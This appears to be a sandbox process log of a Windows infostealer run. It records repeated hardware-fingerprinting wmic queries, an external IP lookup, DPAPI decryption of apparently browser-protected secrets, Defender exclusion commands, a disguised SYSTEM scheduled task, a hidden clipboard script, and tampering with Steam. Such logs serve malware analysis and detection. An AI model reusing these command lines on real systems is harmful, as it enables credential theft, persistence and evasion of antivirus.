C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Executor\Xylex.bat

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\deps\extract.js

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\lib\sqlite3.js

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe

"C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5kpjkbri\5kpjkbri.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES83F6.tmp" "c:\Users\Admin\AppData\Local\Temp\5kpjkbri\CSCE400AA8EC443E2A29B455AFBC1AEB.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,240,132,237,149,45,67,26,224,155,156,8,181,224,96,78,151,154,46,202,101,249,97,141,165,239,101,32,47,174,213,144,44,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,118,4,252,204,118,149,111,47,84,90,247,149,190,34,249,18,252,47,179,62,225,47,93,195,23,120,101,61,101,30,235,48,0,0,0,144,60,90,153,163,30,104,172,123,39,168,11,95,160,138,71,243,107,144,2,50,45,70,124,4,172,47,165,61,165,64,105,236,53,38,158,175,136,209,149,37,63,179,220,166,88,37,85,64,0,0,0,118,167,221,170,254,48,117,31,150,36,196,116,199,187,171,38,184,48,64,53,110,62,94,141,234,254,235,232,6,73,237,45,142,243,225,206,25,5,10,78,242,193,201,184,107,245,34,156,238,170,149,227,218,151,82,101,219,166,72,147,198,231,15,120), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,240,132,237,149,45,67,26,224,155,156,8,181,224,96,78,151,154,46,202,101,249,97,141,165,239,101,32,47,174,213,144,44,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,118,4,252,204,118,149,111,47,84,90,247,149,190,34,249,18,252,47,179,62,225,47,93,195,23,120,101,61,101,30,235,48,0,0,0,144,60,90,153,163,30,104,172,123,39,168,11,95,160,138,71,243,107,144,2,50,45,70,124,4,172,47,165,61,165,64,105,236,53,38,158,175,136,209,149,37,63,179,220,166,88,37,85,64,0,0,0,118,167,221,170,254,48,117,31,150,36,196,116,199,187,171,38,184,48,64,53,110,62,94,141,234,254,235,232,6,73,237,45,142,243,225,206,25,5,10,78,242,193,201,184,107,245,34,156,238,170,149,227,218,151,82,101,219,166,72,147,198,231,15,120), $null, 'CurrentUser')

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,30,33,9,7,82,225,214,92,15,159,202,147,139,45,89,87,231,151,227,53,170,79,92,11,223,143,97,106,97,154,161,9,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,21,253,137,58,142,103,70,102,12,189,67,174,111,249,213,75,220,211,167,169,116,14,13,182,98,95,162,252,2,230,176,103,48,0,0,0,52,214,32,138,26,48,216,25,50,239,33,228,149,1,46,204,28,5,199,198,129,96,1,203,31,101,98,78,63,94,55,14,217,3,117,232,82,31,234,98,233,98,205,228,177,255,26,93,64,0,0,0,130,107,36,32,57,149,185,197,48,184,95,52,114,206,152,10,184,207,1,53,59,142,23,125,248,153,95,41,99,30,222,95,238,92,97,132,248,36,245,34,7,59,219,119,201,126,196,81,133,18,22,202,225,208,186,249,141,11,195,129,16,159,30,250), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,30,33,9,7,82,225,214,92,15,159,202,147,139,45,89,87,231,151,227,53,170,79,92,11,223,143,97,106,97,154,161,9,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,21,253,137,58,142,103,70,102,12,189,67,174,111,249,213,75,220,211,167,169,116,14,13,182,98,95,162,252,2,230,176,103,48,0,0,0,52,214,32,138,26,48,216,25,50,239,33,228,149,1,46,204,28,5,199,198,129,96,1,203,31,101,98,78,63,94,55,14,217,3,117,232,82,31,234,98,233,98,205,228,177,255,26,93,64,0,0,0,130,107,36,32,57,149,185,197,48,184,95,52,114,206,152,10,184,207,1,53,59,142,23,125,248,153,95,41,99,30,222,95,238,92,97,132,248,36,245,34,7,59,219,119,201,126,196,81,133,18,22,202,225,208,186,249,141,11,195,129,16,159,30,250), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "sc config "Steam Client Service" start=disabled"

C:\Windows\system32\sc.exe

sc config "Steam Client Service" start=disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""

C:\Windows\system32\cscript.exe

cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f5jwmi4n\f5jwmi4n.cmdline"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8A11.tmp" "c:\Users\Admin\AppData\Local\Temp\f5jwmi4n\CSC1556E0DAFDB493FA0E7B8B181B8B64.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\system32\getmac.exe

getmac /NH

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

